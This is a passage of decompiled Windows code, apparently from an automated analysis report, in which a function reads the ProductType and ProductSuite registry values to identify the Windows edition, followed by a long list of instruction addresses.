                                                                                                				_t97 = _t96 ^ _t220;
                                                                                                				_t220[0xa08] = _t97;
                                                                                                				 *[fs:0x0] = _t220 - 0xc;
                                                                                                				 *((intOrPtr*)(_t220 - 0x1c)) = 0xfc75c4;
                                                                                                				 *(_t220 - 0x18) = 0;
                                                                                                				 *(_t220 - 4) = 0;
                                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x1c)) + 4))(_t97, __edi, __esi, __ebx,  *[fs:0x0], 0xfb5f18, 0xffffffff);
                                                                                                				_t102 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\ProductOptions", 0, 0x20119, _t220 - 0x18); // executed
                                                                                                				if(_t102 >= 0) {
                                                                                                					 *(_t220 - 0x20) = 0x208;
                                                                                                					_t108 = RegQueryValueExW( *(_t220 - 0x18), L"ProductType", 0, 0,  &(_t220[0x800]), _t220 - 0x20); // executed
                                                                                                					if(_t108 == 0) {
                                                                                                						_t133 = 0xfffffffe;
                                                                                                						while(1) {
                                                                                                							_t133 = _t133 + 2;
                                                                                                							_t162 =  *(_t133 + L"WinNT") & 0x0000ffff;
                                                                                                							_t164 = _t220[_t133 + 0x800] & 0x0000ffff;
                                                                                                							_t227 = _t164 - _t162;
                                                                                                							if(_t227 < 0 || _t227 > 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t164 == 0 || _t162 == 0) {
                                                                                                								 *0xfd2680 = 1;
                                                                                                								_t136 = 0;
                                                                                                							} else {
                                                                                                								continue;
                                                                                                							}
                                                                                                							L16:
                                                                                                							 *0xfd2684 = _t136;
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						_t134 = 0xfffffffe;
                                                                                                						asm("o16 nop [eax+eax]");
                                                                                                						while(1) {
                                                                                                							_t134 = _t134 + 2;
                                                                                                							_t163 =  *(_t134 + L"ServerNT") & 0x0000ffff;
                                                                                                							_t164 = _t220[_t134 + 0x800] & 0x0000ffff;
                                                                                                							__eflags = _t164 - _t163;
                                                                                                							if(__eflags < 0 || __eflags > 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							__eflags = _t164;
                                                                                                							if(_t164 == 0) {
                                                                                                								L13:
                                                                                                								_t135 = 3;
                                                                                                							} else {
                                                                                                								__eflags = _t163;
                                                                                                								if(_t163 != 0) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									goto L13;
                                                                                                								}
                                                                                                							}
                                                                                                							L15:
                                                                                                							 *0xfd2680 = _t135;
                                                                                                							_t136 = 1;
                                                                                                							goto L16;
                                                                                                						}
                                                                                                						_t135 = 2;
                                                                                                						goto L15;
                                                                                                					}
                                                                                                					L17:
                                                                                                					 *(_t220 - 0x24) = 0x800;
                                                                                                					_t111 = RegQueryValueExW( *(_t220 - 0x18), L"ProductSuite", 0, 0, _t220, _t220 - 0x24); // executed
                                                                                                					if(_t111 == 0) {
                                                                                                						_t146 = 0;
                                                                                                						_t188 = _t220;
                                                                                                						_t112 = _t188;
                                                                                                						 *(_t220 - 0x10) = _t188;
                                                                                                						 *(_t220 - 0x14) = 0;
                                                                                                						if( *_t220 != 0) {
                                                                                                							do {
                                                                                                								_t112 =  &(_t112[2]);
                                                                                                								_t146 = _t146 + 1;
                                                                                                							} while ( *_t112 != 0);
                                                                                                							 *(_t220 - 0x14) = _t146;
                                                                                                						}
                                                                                                						if(_t146 != 0) {
                                                                                                							_t140 =  *0xfd2682;
                                                                                                							_t114 = L"Small Business" - 2;
                                                                                                							 *((intOrPtr*)(_t220 - 0x28)) = _t114;
                                                                                                							do {
                                                                                                								_t165 = _t114;
                                                                                                								_t195 = _t188 - L"Small Business";
                                                                                                								asm("o16 nop [eax+eax]");
                                                                                                								while(1) {
                                                                                                									_t115 =  *(_t195 + _t165 + 2) & 0x0000ffff;
                                                                                                									_t164 = _t165 + 2;
                                                                                                									_t147 =  *(_t165 + 2) & 0x0000ffff;
                                                                                                									_t235 = _t115 - _t147;
                                                                                                									if(_t235 < 0 || _t235 > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									if(_t115 == 0 || _t147 == 0) {
                                                                                                										_t140 = _t140 | 0x00000001;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										continue;
                                                                                                									}
                                                                                                									L109:
                                                                                                									_t161 = 0;
                                                                                                									 *(_t220 - 0x14) = 0;
                                                                                                									_t188 = _t188 +  *(_t220 - 0x14) * 2 + 2;
                                                                                                									 *(_t220 - 0x10) = _t188;
                                                                                                									_t130 = _t188;
                                                                                                									if( *_t188 != 0) {
                                                                                                										do {
                                                                                                											_t130 =  &(_t130[2]);
                                                                                                											_t161 = _t161 + 1;
                                                                                                										} while ( *_t130 != 0);
                                                                                                										 *(_t220 - 0x14) = _t161;
                                                                                                									}
                                                                                                									goto L112;
                                                                                                								}
                                                                                                								_t167 = L"Enterprise" - 2;
                                                                                                								_t197 = _t188 - L"Enterprise";
                                                                                                								__eflags = _t197;
                                                                                                								while(1) {
                                                                                                									_t116 =  *(_t167 + 2 + _t197) & 0x0000ffff;
                                                                                                									_t164 = _t167 + 2;
                                                                                                									_t148 =  *(_t167 + 2) & 0x0000ffff;
                                                                                                									__eflags = _t116 - _t148;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t116;
                                                                                                									if(_t116 == 0) {
                                                                                                										L34:
                                                                                                										_t140 = _t140 | 0x00000002;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t148;
                                                                                                										if(_t148 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L34;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t169 = L"BackOffice" - 2;
                                                                                                								_t199 = _t188 - L"BackOffice";
                                                                                                								__eflags = _t199;
                                                                                                								while(1) {
                                                                                                									_t117 =  *(_t169 + 2 + _t199) & 0x0000ffff;
                                                                                                									_t164 = _t169 + 2;
                                                                                                									_t149 =  *(_t169 + 2) & 0x0000ffff;
                                                                                                									__eflags = _t117 - _t149;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t117;
                                                                                                									if(_t117 == 0) {
                                                                                                										L40:
                                                                                                										_t140 = _t140 | 0x00000004;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t149;
                                                                                                										if(_t149 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L40;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t171 = L"CommunicationServer" - 2;
                                                                                                								_t201 = _t188 - L"CommunicationServer";
                                                                                                								__eflags = _t201;
                                                                                                								while(1) {
                                                                                                									_t118 =  *(_t171 + 2 + _t201) & 0x0000ffff;
                                                                                                									_t164 = _t171 + 2;
                                                                                                									_t150 =  *(_t171 + 2) & 0x0000ffff;
                                                                                                									__eflags = _t118 - _t150;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t118;
                                                                                                									if(_t118 == 0) {
                                                                                                										L46:
                                                                                                										_t140 = _t140 | 0x00000008;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t150;
                                                                                                										if(_t150 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L46;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t173 = L"Terminal Server" - 2;
                                                                                                								_t203 = _t188 - L"Terminal Server";
                                                                                                								__eflags = _t203;
                                                                                                								while(1) {
                                                                                                									_t119 =  *(_t173 + 2 + _t203) & 0x0000ffff;
                                                                                                									_t164 = _t173 + 2;
                                                                                                									_t151 =  *(_t173 + 2) & 0x0000ffff;
                                                                                                									__eflags = _t119 - _t151;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t119;
                                                                                                									if(_t119 == 0) {
                                                                                                										L52:
                                                                                                										_t140 = _t140 | 0x00000010;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t151;
                                                                                                										if(_t151 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L52;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t175 = L"Small Business(Restricted)" - 2;
                                                                                                								_t205 = _t188 - L"Small Business(Restricted)";
                                                                                                								__eflags = _t205;
                                                                                                								while(1) {
                                                                                                									_t120 =  *(_t175 + 2 + _t205) & 0x0000ffff;
                                                                                                									_t164 = _t175 + 2;
                                                                                                									_t152 =  *(_t175 + 2) & 0x0000ffff;
                                                                                                									__eflags = _t120 - _t152;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t120;
                                                                                                									if(_t120 == 0) {
                                                                                                										L58:
                                                                                                										_t140 = _t140 | 0x00000020;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t152;
                                                                                                										if(_t152 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L58;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t177 = L"EmbeddedNT" - 2;
                                                                                                								_t207 = _t188 - L"EmbeddedNT";
                                                                                                								__eflags = _t207;
                                                                                                								while(1) {
                                                                                                									_t121 =  *(_t177 + 2 + _t207) & 0x0000ffff;
                                                                                                									_t164 = _t177 + 2;
                                                                                                									_t153 =  *(_t177 + 2) & 0x0000ffff;
                                                                                                									__eflags = _t121 - _t153;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t121;
                                                                                                									if(_t121 == 0) {
                                                                                                										L64:
                                                                                                										_t140 = _t140 | 0x00000040;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t153;
                                                                                                										if(_t153 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L64;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t179 = L"DataCenter" - 2;
                                                                                                								_t209 = _t188 - L"DataCenter";
                                                                                                								__eflags = _t209;
                                                                                                								while(1) {
                                                                                                									_t122 =  *(_t179 + 2 + _t209) & 0x0000ffff;
                                                                                                									_t164 = _t179 + 2;
                                                                                                									_t154 =  *(_t179 + 2) & 0x0000ffff;
                                                                                                									__eflags = _t122 - _t154;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t122;
                                                                                                									if(_t122 == 0) {
                                                                                                										L70:
                                                                                                										_t140 = _t140 | 0x00000080;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t154;
                                                                                                										if(_t154 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L70;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t189 =  &(_t188[0xfffffffffffffffe]);
                                                                                                								_t211 = L"Personal" -  *(_t220 - 0x10);
                                                                                                								__eflags = _t211;
                                                                                                								_t180 = _t189;
                                                                                                								while(1) {
                                                                                                									_t155 =  *( &(_t180[1]) + _t211) & 0x0000ffff;
                                                                                                									_t164 =  &(_t180[1]);
                                                                                                									_t123 = _t180[1] & 0x0000ffff;
                                                                                                									__eflags = _t123 - _t155;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t123;
                                                                                                									if(_t123 == 0) {
                                                                                                										L76:
                                                                                                										_t131 = 0x200;
                                                                                                										L107:
                                                                                                										_t140 = _t140 | _t131;
                                                                                                										__eflags = _t140;
                                                                                                										 *0xfd2682 = _t140;
                                                                                                									} else {
                                                                                                										__eflags = _t155;
                                                                                                										if(_t155 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L76;
                                                                                                										}
                                                                                                									}
                                                                                                									L108:
                                                                                                									_t188 =  *(_t220 - 0x10);
                                                                                                									goto L109;
                                                                                                								}
                                                                                                								_t181 = _t189;
                                                                                                								_t213 = L"Blade" -  *(_t220 - 0x10);
                                                                                                								__eflags = _t213;
                                                                                                								while(1) {
                                                                                                									_t156 =  *( &(_t181[1]) + _t213) & 0x0000ffff;
                                                                                                									_t164 =  &(_t181[1]);
                                                                                                									_t124 = _t181[1] & 0x0000ffff;
                                                                                                									__eflags = _t124 - _t156;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t124;
                                                                                                									if(_t124 == 0) {
                                                                                                										L82:
                                                                                                										_t131 = 0x400;
                                                                                                										goto L107;
                                                                                                									} else {
                                                                                                										__eflags = _t156;
                                                                                                										if(_t156 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L82;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L108;
                                                                                                								}
                                                                                                								_t182 = _t189;
                                                                                                								_t215 = L"Embedded(Restricted)" -  *(_t220 - 0x10);
                                                                                                								__eflags = _t215;
                                                                                                								while(1) {
                                                                                                									_t157 =  *( &(_t182[1]) + _t215) & 0x0000ffff;
                                                                                                									_t164 =  &(_t182[1]);
                                                                                                									_t125 = _t182[1] & 0x0000ffff;
                                                                                                									__eflags = _t125 - _t157;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t125;
                                                                                                									if(_t125 == 0) {
                                                                                                										L88:
                                                                                                										_t131 = 0x800;
                                                                                                										goto L107;
                                                                                                									} else {
                                                                                                										__eflags = _t157;
                                                                                                										if(_t157 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L88;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L108;
                                                                                                								}
                                                                                                								_t183 = _t189;
                                                                                                								_t217 = L"Security Appliance" -  *(_t220 - 0x10);
                                                                                                								__eflags = _t217;
                                                                                                								while(1) {
                                                                                                									_t158 =  *( &(_t183[1]) + _t217) & 0x0000ffff;
                                                                                                									_t164 =  &(_t183[1]);
                                                                                                									_t126 = _t183[1] & 0x0000ffff;
                                                                                                									__eflags = _t126 - _t158;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t126;
                                                                                                									if(_t126 == 0) {
                                                                                                										L94:
                                                                                                										_t131 = 0x1000;
                                                                                                										goto L107;
                                                                                                									} else {
                                                                                                										__eflags = _t158;
                                                                                                										if(_t158 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L94;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L108;
                                                                                                								}
                                                                                                								_t184 = _t189;
                                                                                                								_t219 = L"Storage Server" -  *(_t220 - 0x10);
                                                                                                								__eflags = _t219;
                                                                                                								while(1) {
                                                                                                									_t159 =  *( &(_t184[1]) + _t219) & 0x0000ffff;
                                                                                                									_t164 =  &(_t184[1]);
                                                                                                									_t127 = _t184[1] & 0x0000ffff;
                                                                                                									__eflags = _t127 - _t159;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										break;
                                                                                                									}
                                                                                                									__eflags = _t127;
                                                                                                									if(_t127 == 0) {
                                                                                                										L100:
                                                                                                										_t131 = 0x2000;
                                                                                                										goto L107;
                                                                                                									} else {
                                                                                                										__eflags = _t159;
                                                                                                										if(_t159 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L100;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L108;
                                                                                                								}
                                                                                                								_t164 = L"Compute Server" -  *(_t220 - 0x10);
                                                                                                								__eflags = _t164;
                                                                                                								while(1) {
                                                                                                									_t160 =  *( &(_t189[1]) + _t164) & 0x0000ffff;
                                                                                                									_t189 =  &(_t189[1]);
                                                                                                									_t128 =  *_t189 & 0x0000ffff;
                                                                                                									__eflags = _t128 - _t160;
                                                                                                									if(__eflags < 0 || __eflags > 0) {
                                                                                                										goto L108;
                                                                                                									}
                                                                                                									__eflags = _t128;
                                                                                                									if(_t128 == 0) {
                                                                                                										L106:
                                                                                                										_t131 = 0x4000;
                                                                                                										goto L107;
                                                                                                									} else {
                                                                                                										__eflags = _t160;
                                                                                                										if(_t160 != 0) {
                                                                                                											continue;
                                                                                                										} else {
                                                                                                											goto L106;
                                                                                                										}
                                                                                                									}
                                                                                                									goto L108;
                                                                                                								}
                                                                                                								goto L108;
                                                                                                								L112:
                                                                                                								_t114 =  *((intOrPtr*)(_t220 - 0x28));
                                                                                                							} while (_t161 != 0);
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				 *(_t220 - 4) = 0xffffffff;
                                                                                                				_t103 =  *(_t220 - 0x18);
                                                                                                				 *((intOrPtr*)(_t220 - 0x1c)) = 0xfc75c4;
                                                                                                				if(_t103 != 0) {
                                                                                                					RegCloseKey(_t103); // executed
                                                                                                					 *(_t220 - 0x18) = 0;
                                                                                                				}
                                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
                                                                                                				return E00F80D7F(_t220[0xa08] ^ _t220, _t164);
                                                                                                			}


















































































                                                                                                0x00f76551
                                                                                                0x00f7656f
                                                                                                0x00f76574
                                                                                                0x00f76576
                                                                                                0x00f76583
                                                                                                0x00f76589
                                                                                                0x00f76590
                                                                                                0x00f76597
                                                                                                0x00f765a4
                                                                                                0x00f765bc
                                                                                                0x00f765c4
                                                                                                0x00f765da
                                                                                                0x00f765ee
                                                                                                0x00f765f2
                                                                                                0x00f765f8
                                                                                                0x00f76600
                                                                                                0x00f76600
                                                                                                0x00f76603
                                                                                                0x00f7660a
                                                                                                0x00f76612
                                                                                                0x00f76615
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7661c
                                                                                                0x00f76628
                                                                                                0x00f7662e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76677
                                                                                                0x00f76677
                                                                                                0x00000000
                                                                                                0x00f76677
                                                                                                0x00f76632
                                                                                                0x00f76637
                                                                                                0x00f76640
                                                                                                0x00f76640
                                                                                                0x00f76643
                                                                                                0x00f7664a
                                                                                                0x00f76652
                                                                                                0x00f76655
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76659
                                                                                                0x00f7665c
                                                                                                0x00f76663
                                                                                                0x00f76663
                                                                                                0x00f7665e
                                                                                                0x00f7665e
                                                                                                0x00f76661
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76661
                                                                                                0x00f7666f
                                                                                                0x00f7666f
                                                                                                0x00f76675
                                                                                                0x00000000
                                                                                                0x00f76675
                                                                                                0x00f7666a
                                                                                                0x00000000
                                                                                                0x00f7666a
                                                                                                0x00f7667c
                                                                                                0x00f7667f
                                                                                                0x00f76697
                                                                                                0x00f7669b
                                                                                                0x00f766a1
                                                                                                0x00f766a3
                                                                                                0x00f766a6
                                                                                                0x00f766a8
                                                                                                0x00f766ab
                                                                                                0x00f766b2
                                                                                                0x00f766b4
                                                                                                0x00f766b4
                                                                                                0x00f766b7
                                                                                                0x00f766b8
                                                                                                0x00f766be
                                                                                                0x00f766be
                                                                                                0x00f766c3
                                                                                                0x00f766c9
                                                                                                0x00f766d5
                                                                                                0x00f766d8
                                                                                                0x00f766e0
                                                                                                0x00f766e2
                                                                                                0x00f766e4
                                                                                                0x00f766ea
                                                                                                0x00f766f0
                                                                                                0x00f766f0
                                                                                                0x00f766f5
                                                                                                0x00f766f8
                                                                                                0x00f766fb
                                                                                                0x00f766fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76705
                                                                                                0x00f7670c
                                                                                                0x00f76710
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76a0e
                                                                                                0x00f76a11
                                                                                                0x00f76a13
                                                                                                0x00f76a19
                                                                                                0x00f76a1c
                                                                                                0x00f76a1f
                                                                                                0x00f76a24
                                                                                                0x00f76a26
                                                                                                0x00f76a26
                                                                                                0x00f76a29
                                                                                                0x00f76a2a
                                                                                                0x00f76a30
                                                                                                0x00f76a30
                                                                                                0x00000000
                                                                                                0x00f76a24
                                                                                                0x00f76723
                                                                                                0x00f76726
                                                                                                0x00f76726
                                                                                                0x00f76730
                                                                                                0x00f76730
                                                                                                0x00f76735
                                                                                                0x00f76738
                                                                                                0x00f7673b
                                                                                                0x00f7673e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76742
                                                                                                0x00f76745
                                                                                                0x00f7674c
                                                                                                0x00f7674c
                                                                                                0x00f76750
                                                                                                0x00f76747
                                                                                                0x00f76747
                                                                                                0x00f7674a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7674a
                                                                                                0x00000000
                                                                                                0x00f76745
                                                                                                0x00f76763
                                                                                                0x00f76766
                                                                                                0x00f76766
                                                                                                0x00f76770
                                                                                                0x00f76770
                                                                                                0x00f76775
                                                                                                0x00f76778
                                                                                                0x00f7677b
                                                                                                0x00f7677e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76782
                                                                                                0x00f76785
                                                                                                0x00f7678c
                                                                                                0x00f7678c
                                                                                                0x00f76790
                                                                                                0x00f76787
                                                                                                0x00f76787
                                                                                                0x00f7678a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7678a
                                                                                                0x00000000
                                                                                                0x00f76785
                                                                                                0x00f767a3
                                                                                                0x00f767a6
                                                                                                0x00f767a6
                                                                                                0x00f767b0
                                                                                                0x00f767b0
                                                                                                0x00f767b5
                                                                                                0x00f767b8
                                                                                                0x00f767bb
                                                                                                0x00f767be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f767c2
                                                                                                0x00f767c5
                                                                                                0x00f767cc
                                                                                                0x00f767cc
                                                                                                0x00f767d0
                                                                                                0x00f767c7
                                                                                                0x00f767c7
                                                                                                0x00f767ca
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f767ca
                                                                                                0x00000000
                                                                                                0x00f767c5
                                                                                                0x00f767e3
                                                                                                0x00f767e6
                                                                                                0x00f767e6
                                                                                                0x00f767f0
                                                                                                0x00f767f0
                                                                                                0x00f767f5
                                                                                                0x00f767f8
                                                                                                0x00f767fb
                                                                                                0x00f767fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76802
                                                                                                0x00f76805
                                                                                                0x00f7680c
                                                                                                0x00f7680c
                                                                                                0x00f76810
                                                                                                0x00f76807
                                                                                                0x00f76807
                                                                                                0x00f7680a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7680a
                                                                                                0x00000000
                                                                                                0x00f76805
                                                                                                0x00f76823
                                                                                                0x00f76826
                                                                                                0x00f76826
                                                                                                0x00f76830
                                                                                                0x00f76830
                                                                                                0x00f76835
                                                                                                0x00f76838
                                                                                                0x00f7683b
                                                                                                0x00f7683e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76842
                                                                                                0x00f76845
                                                                                                0x00f7684c
                                                                                                0x00f7684c
                                                                                                0x00f76850
                                                                                                0x00f76847
                                                                                                0x00f76847
                                                                                                0x00f7684a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7684a
                                                                                                0x00000000
                                                                                                0x00f76845
                                                                                                0x00f76863
                                                                                                0x00f76866
                                                                                                0x00f76866
                                                                                                0x00f76870
                                                                                                0x00f76870
                                                                                                0x00f76875
                                                                                                0x00f76878
                                                                                                0x00f7687b
                                                                                                0x00f7687e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76882
                                                                                                0x00f76885
                                                                                                0x00f7688c
                                                                                                0x00f7688c
                                                                                                0x00f76890
                                                                                                0x00f76887
                                                                                                0x00f76887
                                                                                                0x00f7688a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7688a
                                                                                                0x00000000
                                                                                                0x00f76885
                                                                                                0x00f768a3
                                                                                                0x00f768a6
                                                                                                0x00f768a6
                                                                                                0x00f768b0
                                                                                                0x00f768b0
                                                                                                0x00f768b5
                                                                                                0x00f768b8
                                                                                                0x00f768bb
                                                                                                0x00f768be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f768c2
                                                                                                0x00f768c5
                                                                                                0x00f768cc
                                                                                                0x00f768d1
                                                                                                0x00f768d4
                                                                                                0x00f768c7
                                                                                                0x00f768c7
                                                                                                0x00f768ca
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f768ca
                                                                                                0x00000000
                                                                                                0x00f768c5
                                                                                                0x00f768e0
                                                                                                0x00f768e8
                                                                                                0x00f768e8
                                                                                                0x00f768eb
                                                                                                0x00f768f0
                                                                                                0x00f768f0
                                                                                                0x00f768f5
                                                                                                0x00f768f8
                                                                                                0x00f768fb
                                                                                                0x00f768fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76902
                                                                                                0x00f76905
                                                                                                0x00f7690c
                                                                                                0x00f7690c
                                                                                                0x00f76a01
                                                                                                0x00f76a01
                                                                                                0x00f76a01
                                                                                                0x00f76a04
                                                                                                0x00f76907
                                                                                                0x00f76907
                                                                                                0x00f7690a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7690a
                                                                                                0x00f76a0b
                                                                                                0x00f76a0b
                                                                                                0x00000000
                                                                                                0x00f76a0b
                                                                                                0x00f7691b
                                                                                                0x00f7691d
                                                                                                0x00f7691d
                                                                                                0x00f76920
                                                                                                0x00f76920
                                                                                                0x00f76925
                                                                                                0x00f76928
                                                                                                0x00f7692b
                                                                                                0x00f7692e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76932
                                                                                                0x00f76935
                                                                                                0x00f7693c
                                                                                                0x00f7693c
                                                                                                0x00000000
                                                                                                0x00f76937
                                                                                                0x00f76937
                                                                                                0x00f7693a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7693a
                                                                                                0x00000000
                                                                                                0x00f76935
                                                                                                0x00f7694b
                                                                                                0x00f7694d
                                                                                                0x00f7694d
                                                                                                0x00f76950
                                                                                                0x00f76950
                                                                                                0x00f76955
                                                                                                0x00f76958
                                                                                                0x00f7695b
                                                                                                0x00f7695e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76962
                                                                                                0x00f76965
                                                                                                0x00f7696c
                                                                                                0x00f7696c
                                                                                                0x00000000
                                                                                                0x00f76967
                                                                                                0x00f76967
                                                                                                0x00f7696a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7696a
                                                                                                0x00000000
                                                                                                0x00f76965
                                                                                                0x00f7697b
                                                                                                0x00f7697d
                                                                                                0x00f7697d
                                                                                                0x00f76980
                                                                                                0x00f76980
                                                                                                0x00f76985
                                                                                                0x00f76988
                                                                                                0x00f7698b
                                                                                                0x00f7698e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f76992
                                                                                                0x00f76995
                                                                                                0x00f7699c
                                                                                                0x00f7699c
                                                                                                0x00000000
                                                                                                0x00f76997
                                                                                                0x00f76997
                                                                                                0x00f7699a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7699a
                                                                                                0x00000000
                                                                                                0x00f76995
                                                                                                0x00f769a8
                                                                                                0x00f769aa
                                                                                                0x00f769aa
                                                                                                0x00f769b0
                                                                                                0x00f769b0
                                                                                                0x00f769b5
                                                                                                0x00f769b8
                                                                                                0x00f769bb
                                                                                                0x00f769be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f769c2
                                                                                                0x00f769c5
                                                                                                0x00f769cc
                                                                                                0x00f769cc
                                                                                                0x00000000
                                                                                                0x00f769c7
                                                                                                0x00f769c7
                                                                                                0x00f769ca
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f769ca
                                                                                                0x00000000
                                                                                                0x00f769c5
                                                                                                0x00f769d8
                                                                                                0x00f769d8
                                                                                                0x00f769e0
                                                                                                0x00f769e0
                                                                                                0x00f769e5
                                                                                                0x00f769e8
                                                                                                0x00f769eb
                                                                                                0x00f769ee
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f769f2
                                                                                                0x00f769f5
                                                                                                0x00f769fc
                                                                                                0x00f769fc
                                                                                                0x00000000
                                                                                                0x00f769f7
                                                                                                0x00f769f7
                                                                                                0x00f769fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f769fa
                                                                                                0x00000000
                                                                                                0x00f769f5
                                                                                                0x00000000
                                                                                                0x00f76a33
                                                                                                0x00f76a33
                                                                                                0x00f76a36
                                                                                                0x00f766e0
                                                                                                0x00f766c3
                                                                                                0x00f7669b
                                                                                                0x00f76a3e
